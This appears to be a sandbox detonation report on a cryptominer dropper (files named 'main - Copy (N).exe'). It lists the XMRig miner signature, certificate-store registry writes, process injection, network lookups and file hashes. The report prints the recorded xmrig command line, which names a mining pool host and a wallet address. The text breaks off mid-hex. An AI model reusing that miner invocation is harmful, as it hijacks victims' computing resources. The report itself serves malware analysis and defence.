memory/3560-28-0x00007FF6B9BF0000-0x00007FF6BA6F3000-memory.dmp
memory/3560-29-0x00007FF6B9BF0000-0x00007FF6BA6F3000-memory.dmp
memory/3560-30-0x00007FF6B9BF0000-0x00007FF6BA6F3000-memory.dmp
memory/3560-31-0x00007FF6B9BF0000-0x00007FF6BA6F3000-memory.dmp
memory/3560-32-0x00007FF6B9BF0000-0x00007FF6BA6F3000-memory.dmp
memory/3560-33-0x00007FF6B9BF0000-0x00007FF6BA6F3000-memory.dmp
memory/3560-34-0x00007FF6B9BF0000-0x00007FF6BA6F3000-memory.dmp
memory/3560-35-0x00007FF6B9BF0000-0x00007FF6BA6F3000-memory.dmp
memory/3560-36-0x00007FF6B9BF0000-0x00007FF6BA6F3000-memory.dmp
memory/3560-37-0x00007FF6B9BF0000-0x00007FF6BA6F3000-memory.dmp
memory/3560-38-0x00007FF6B9BF0000-0x00007FF6BA6F3000-memory.dmp
memory/3560-39-0x00007FF6B9BF0000-0x00007FF6BA6F3000-memory.dmp
memory/3560-40-0x00007FF6B9BF0000-0x00007FF6BA6F3000-memory.dmp
memory/3560-41-0x00007FF6B9BF0000-0x00007FF6BA6F3000-memory.dmp
memory/3560-42-0x00007FF6B9BF0000-0x00007FF6BA6F3000-memory.dmp
memory/3560-43-0x00007FF6B9BF0000-0x00007FF6BA6F3000-memory.dmp
memory/3560-44-0x00007FF6B9BF0000-0x00007FF6BA6F3000-memory.dmp
memory/3560-45-0x00007FF6B9BF0000-0x00007FF6BA6F3000-memory.dmp
memory/3560-46-0x00007FF6B9BF0000-0x00007FF6BA6F3000-memory.dmp
memory/3560-47-0x00007FF6B9BF0000-0x00007FF6BA6F3000-memory.dmp
memory/3560-48-0x00007FF6B9BF0000-0x00007FF6BA6F3000-memory.dmp
memory/3560-49-0x00007FF6B9BF0000-0x00007FF6BA6F3000-memory.dmp
memory/3560-50-0x00007FF6B9BF0000-0x00007FF6BA6F3000-memory.dmp
memory/3560-51-0x00007FF6B9BF0000-0x00007FF6BA6F3000-memory.dmp
memory/3560-52-0x00007FF6B9BF0000-0x00007FF6BA6F3000-memory.dmp
memory/3560-53-0x00007FF6B9BF0000-0x00007FF6BA6F3000-memory.dmp
memory/3560-54-0x00007FF6B9BF0000-0x00007FF6BA6F3000-memory.dmp
memory/3560-55-0x00007FF6B9BF0000-0x00007FF6BA6F3000-memory.dmp
memory/3560-56-0x00007FF6B9BF0000-0x00007FF6BA6F3000-memory.dmp
memory/3560-57-0x00007FF6B9BF0000-0x00007FF6BA6F3000-memory.dmp
memory/3560-58-0x00007FF6B9BF0000-0x00007FF6BA6F3000-memory.dmp
memory/3560-59-0x00007FF6B9BF0000-0x00007FF6BA6F3000-memory.dmp
memory/3560-60-0x00007FF6B9BF0000-0x00007FF6BA6F3000-memory.dmp
memory/3560-61-0x00007FF6B9BF0000-0x00007FF6BA6F3000-memory.dmp
memory/3560-62-0x00007FF6B9BF0000-0x00007FF6BA6F3000-memory.dmp
memory/3560-63-0x00007FF6B9BF0000-0x00007FF6BA6F3000-memory.dmp
memory/3560-64-0x00007FF6B9BF0000-0x00007FF6BA6F3000-memory.dmp
memory/3560-65-0x00007FF6B9BF0000-0x00007FF6BA6F3000-memory.dmp
memory/3560-66-0x00007FF6B9BF0000-0x00007FF6BA6F3000-memory.dmp
memory/3560-67-0x00007FF6B9BF0000-0x00007FF6BA6F3000-memory.dmp
memory/3560-68-0x00007FF6B9BF0000-0x00007FF6BA6F3000-memory.dmp
memory/3560-69-0x00007FF6B9BF0000-0x00007FF6BA6F3000-memory.dmp
memory/3560-70-0x00007FF6B9BF0000-0x00007FF6BA6F3000-memory.dmp
memory/3560-71-0x00007FF6B9BF0000-0x00007FF6BA6F3000-memory.dmp
memory/3560-72-0x00007FF6B9BF0000-0x00007FF6BA6F3000-memory.dmp
memory/3560-73-0x00007FF6B9BF0000-0x00007FF6BA6F3000-memory.dmp
memory/3560-74-0x00007FF6B9BF0000-0x00007FF6BA6F3000-memory.dmp
memory/3560-75-0x00007FF6B9BF0000-0x00007FF6BA6F3000-memory.dmp
memory/3560-76-0x00007FF6B9BF0000-0x00007FF6BA6F3000-memory.dmp
memory/3560-77-0x00007FF6B9BF0000-0x00007FF6BA6F3000-memory.dmp
memory/3560-78-0x00007FF6B9BF0000-0x00007FF6BA6F3000-memory.dmp
memory/3560-79-0x00007FF6B9BF0000-0x00007FF6BA6F3000-memory.dmp
memory/3560-80-0x00007FF6B9BF0000-0x00007FF6BA6F3000-memory.dmp
memory/3560-81-0x00007FF6B9BF0000-0x00007FF6BA6F3000-memory.dmp
memory/3560-82-0x00007FF6B9BF0000-0x00007FF6BA6F3000-memory.dmp
memory/3560-83-0x00007FF6B9BF0000-0x00007FF6BA6F3000-memory.dmp
memory/3560-84-0x00007FF6B9BF0000-0x00007FF6BA6F3000-memory.dmp
Analysis: behavioral1
Detonation Overview
Submitted
2024-05-20 15:56
Reported
2024-05-22 15:11
Platform
win10v2004-20240508-en
Max time kernel
1795s
Max time network
1804s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (10).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (10).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (10).exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1528 wrote to memory of 4416 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (10).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 1528 wrote to memory of 4416 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (10).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (10).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (10).exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4.159.190.20.in-addr.arpa | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| NL | 23.62.61.113:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 113.61.62.23.in-addr.arpa | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 66.112.168.52.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/4416-16-0x000001D706910000-0x000001D706930000-memory.dmp
memory/4416-17-0x000001D708210000-0x000001D708230000-memory.dmp
memory/4416-18-0x00007FF6CAB20000-0x00007FF6CB623000-memory.dmp
memory/4416-20-0x000001D708250000-0x000001D708270000-memory.dmp
memory/4416-19-0x000001D708230000-0x000001D708250000-memory.dmp
memory/4416-21-0x00007FF6CAB20000-0x00007FF6CB623000-memory.dmp
memory/4416-22-0x00007FF6CAB20000-0x00007FF6CB623000-memory.dmp
memory/4416-25-0x000001D708250000-0x000001D708270000-memory.dmp
memory/4416-24-0x000001D708230000-0x000001D708250000-memory.dmp
memory/4416-23-0x00007FF6CAB20000-0x00007FF6CB623000-memory.dmp
memory/4416-26-0x00007FF6CAB20000-0x00007FF6CB623000-memory.dmp
memory/4416-27-0x00007FF6CAB20000-0x00007FF6CB623000-memory.dmp
memory/4416-28-0x00007FF6CAB20000-0x00007FF6CB623000-memory.dmp
memory/4416-29-0x00007FF6CAB20000-0x00007FF6CB623000-memory.dmp
memory/4416-30-0x00007FF6CAB20000-0x00007FF6CB623000-memory.dmp
memory/4416-31-0x00007FF6CAB20000-0x00007FF6CB623000-memory.dmp
memory/4416-32-0x00007FF6CAB20000-0x00007FF6CB623000-memory.dmp
memory/4416-33-0x00007FF6CAB20000-0x00007FF6CB623000-memory.dmp
memory/4416-34-0x00007FF6CAB20000-0x00007FF6CB623000-memory.dmp
memory/4416-35-0x00007FF6CAB20000-0x00007FF6CB623000-memory.dmp
memory/4416-36-0x00007FF6CAB20000-0x00007FF6CB623000-memory.dmp
memory/4416-37-0x00007FF6CAB20000-0x00007FF6CB623000-memory.dmp
memory/4416-38-0x00007FF6CAB20000-0x00007FF6CB623000-memory.dmp
memory/4416-39-0x00007FF6CAB20000-0x00007FF6CB623000-memory.dmp
memory/4416-40-0x00007FF6CAB20000-0x00007FF6CB623000-memory.dmp
memory/4416-41-0x00007FF6CAB20000-0x00007FF6CB623000-memory.dmp
memory/4416-42-0x00007FF6CAB20000-0x00007FF6CB623000-memory.dmp
memory/4416-43-0x00007FF6CAB20000-0x00007FF6CB623000-memory.dmp
memory/4416-44-0x00007FF6CAB20000-0x00007FF6CB623000-memory.dmp
memory/4416-45-0x00007FF6CAB20000-0x00007FF6CB623000-memory.dmp
memory/4416-46-0x00007FF6CAB20000-0x00007FF6CB623000-memory.dmp
memory/4416-47-0x00007FF6CAB20000-0x00007FF6CB623000-memory.dmp
memory/4416-48-0x00007FF6CAB20000-0x00007FF6CB623000-memory.dmp
memory/4416-49-0x00007FF6CAB20000-0x00007FF6CB623000-memory.dmp
memory/4416-50-0x00007FF6CAB20000-0x00007FF6CB623000-memory.dmp
memory/4416-51-0x00007FF6CAB20000-0x00007FF6CB623000-memory.dmp
memory/4416-52-0x00007FF6CAB20000-0x00007FF6CB623000-memory.dmp
memory/4416-53-0x00007FF6CAB20000-0x00007FF6CB623000-memory.dmp
memory/4416-54-0x00007FF6CAB20000-0x00007FF6CB623000-memory.dmp
memory/4416-55-0x00007FF6CAB20000-0x00007FF6CB623000-memory.dmp
memory/4416-56-0x00007FF6CAB20000-0x00007FF6CB623000-memory.dmp
memory/4416-57-0x00007FF6CAB20000-0x00007FF6CB623000-memory.dmp
memory/4416-58-0x00007FF6CAB20000-0x00007FF6CB623000-memory.dmp
memory/4416-59-0x00007FF6CAB20000-0x00007FF6CB623000-memory.dmp
memory/4416-60-0x00007FF6CAB20000-0x00007FF6CB623000-memory.dmp
memory/4416-61-0x00007FF6CAB20000-0x00007FF6CB623000-memory.dmp
memory/4416-62-0x00007FF6CAB20000-0x00007FF6CB623000-memory.dmp
memory/4416-63-0x00007FF6CAB20000-0x00007FF6CB623000-memory.dmp
memory/4416-64-0x00007FF6CAB20000-0x00007FF6CB623000-memory.dmp
memory/4416-65-0x00007FF6CAB20000-0x00007FF6CB623000-memory.dmp
memory/4416-66-0x00007FF6CAB20000-0x00007FF6CB623000-memory.dmp
memory/4416-67-0x00007FF6CAB20000-0x00007FF6CB623000-memory.dmp
memory/4416-68-0x00007FF6CAB20000-0x00007FF6CB623000-memory.dmp
memory/4416-69-0x00007FF6CAB20000-0x00007FF6CB623000-memory.dmp
memory/4416-70-0x00007FF6CAB20000-0x00007FF6CB623000-memory.dmp
memory/4416-71-0x00007FF6CAB20000-0x00007FF6CB623000-memory.dmp
memory/4416-72-0x00007FF6CAB20000-0x00007FF6CB623000-memory.dmp
memory/4416-73-0x00007FF6CAB20000-0x00007FF6CB623000-memory.dmp
memory/4416-74-0x00007FF6CAB20000-0x00007FF6CB623000-memory.dmp
memory/4416-75-0x00007FF6CAB20000-0x00007FF6CB623000-memory.dmp
memory/4416-76-0x00007FF6CAB20000-0x00007FF6CB623000-memory.dmp
memory/4416-77-0x00007FF6CAB20000-0x00007FF6CB623000-memory.dmp
memory/4416-78-0x00007FF6CAB20000-0x00007FF6CB623000-memory.dmp
memory/4416-79-0x00007FF6CAB20000-0x00007FF6CB623000-memory.dmp
memory/4416-80-0x00007FF6CAB20000-0x00007FF6CB623000-memory.dmp
memory/4416-81-0x00007FF6CAB20000-0x00007FF6CB623000-memory.dmp
memory/4416-82-0x00007FF6CAB20000-0x00007FF6CB623000-memory.dmp
memory/4416-83-0x00007FF6CAB20000-0x00007FF6CB623000-memory.dmp
memory/4416-84-0x00007FF6CAB20000-0x00007FF6CB623000-memory.dmp
Analysis: behavioral9
Detonation Overview
Submitted
2024-05-20 15:56
Reported
2024-05-22 18:28
Platform
win10v2004-20240226-en
Max time kernel
1798s
Max time network
1805s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (5).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2